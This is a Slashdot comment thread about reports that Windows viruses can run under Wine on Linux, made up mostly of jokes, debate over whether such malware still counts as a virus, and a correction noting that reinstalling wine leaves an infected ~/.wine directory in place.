Re:To be pedantic .. (0)

Anonymous Coward | more than 4 years ago | (#29858941)

No offence, but I call your story bullshit. Most people are actually running their servers without configuring anything security wise for years. And yet there isn't any malware outbreak.
Don't blame linux for faulty software that would compromise any os it's running.

It's a trap (1)

RiotingPacifist (1228016) | more than 4 years ago | (#29858831)

The site is already running evil code on my computer against my permission!

(before down-voting look at the top of TFA)

Great... (1)

ctrl-alt-canc (977108) | more than 4 years ago | (#29858885)

Now they can claim a 100% emulation of Windows.

Malware rise (2, Funny)

gmuslera (3436) | more than 4 years ago | (#29858891)

Thousands of Linux systems are now running Windows viruses. That new improvement in Wine made a lot of Linux users intentionally install the last Wine version and browse dangerous places using IE6 under it to see if they get lucky and get some virus. "I'm excited", said one Linux user, "I managed to get 3 different viruses, a worm, and you won't believe, my machine is now part of a botnet! Woohoo!".

Gee, sure is old news around here. (0)

Anonymous Coward | more than 4 years ago | (#29858925)

The magazine that introduced me fully into linux, (ie, it had CDs, which back in 2002, for me, at least, was next to impossible to download isos due to 56k and having to share the connection without a router) Linux Format, ran an article about how you can still hose your linux system if you ran an infected program under wine, if it did nasty things like delete files, osnap, bye bye home directory. If you ran it as root, bye bye linux system.

This was seven years ago.

Strongly misleading headline! (2, Insightful)

Hurricane78 (562437) | more than 4 years ago | (#29858943)

Yeah, it can run viruses, but "not all features may work -- in this case, the crippling of the system, immunity to the task manager, identity theft, etc.".

So in fact, it's not a virus anymore. It's just another program. The very point of being a virus is gone. Because the security settings still hold. (Unless you are retarded enough to run a Wine program as root. But in that case you're just asking for it anyway. ^^)

Re:Strongly misleading headline! (1)

erebadan (1614611) | more than 4 years ago | (#29859089)

Technically speaking a virus is a small piece of code that can replicate and spread itself. Whatever it does (or not) to your system doesn't matter much. Once your machine is infected, you become a threat to others.

Stop whining. (1)

itsybitsy (149808) | more than 4 years ago | (#29858955)

Don't want a virus, it's simple, stop whining.

This is not news (1)

93 Escort Wagon (326346) | more than 4 years ago | (#29859015)

We've seen "viruses running under Wine" stories on Slashdot before. Years before, as a matter of fact.

BTW I love the really pathetic spin in the submission - "things don't work correctly, and that's a plus!"

What will they name it (1)

syntap (242090) | more than 4 years ago | (#29859083)

The Linux virus via WINE, or S-WINE bug.

Just goes to show you (1)

illumastorm (172101) | more than 4 years ago | (#29859099)

This just goes to show you how good Windows emulation on Linux is.

Re:Just goes to show you (1)

jedidiah (1196) | more than 4 years ago | (#29859285)

Yup. An emulated copy of Windows is still a copy of Windows.

You need to treat it like Typhoid Mary and keep it away from things it can infect or get infected by.

Re:Just goes to show you (0)

Anonymous Coward | more than 4 years ago | (#29859337)

Wine is not (an) emulator!/ Wine is not emulation!

Fear the WINE Flu !!! (1)

Jackie_Chan_Fan (730745) | more than 4 years ago | (#29859147)

Obama has just declared the WINE Flu a boring and uninteresting, non mainstream worthless distraction from the launch of Windows 7. It runs viruses natively folks!

Actually Windows 7 is quite good.

Good luck Bro. -Opie

YES (0)

Anonymous Coward | more than 4 years ago | (#29859179)

2010 will definitely be the year of the linux desktop now!

Wrong (2, Insightful)

pablomme (1270790) | more than 4 years ago | (#29859201)

From TFA:

If it managed to infect the Wine registry well enough that it's run automatically, I will have to go into the Wine registry to remove it manually. Or I could run a couple of simple commands:
sudo aptitude purge wine;
sudo aptitude install wine;

Wrong. Wine installs stuff in ~/.wine. The above commands don't touch user directories, so he would end up with a fresh system-wide wine installation but the same malware-ridden user config.

Finally! (0)

Anonymous Coward | more than 4 years ago | (#29859203)

Now Linux is ready for the desktop!

ha, Linux wins yet again! (1)

Tumbleweed (3706) | more than 4 years ago | (#29859347)

See, Linux _can_ do everything Windows can do! A better Windows than Windows...where have I heard that before?

Hmm (1)

Krneki (1192201) | more than 4 years ago | (#29859433)

I hope it won't get the new sWine virus.